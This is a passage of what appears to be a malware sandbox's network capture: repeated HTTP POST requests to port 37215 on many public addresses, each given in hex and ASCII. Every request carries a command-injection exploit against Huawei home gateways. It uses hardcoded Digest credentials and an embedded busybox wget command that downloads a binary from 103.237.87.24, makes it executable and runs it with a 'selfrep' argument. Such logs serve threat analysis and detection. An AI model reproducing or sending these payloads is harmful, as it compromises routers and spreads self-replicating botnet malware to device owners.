                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  261192.168.2.1341412197.198.164.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.080898046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  262192.168.2.1333786133.27.37.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.080903053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  263192.168.2.1356462150.112.84.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.080905914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  264192.168.2.1343090134.78.71.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.096714973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  265192.168.2.134919241.218.192.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.096729994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  266192.168.2.135232241.170.117.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.096745014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  267192.168.2.135419241.110.33.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.096761942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  268192.168.2.1352162157.30.50.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.096781015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  269192.168.2.1341722157.77.230.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.096786022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  270192.168.2.133403041.60.132.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.096795082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 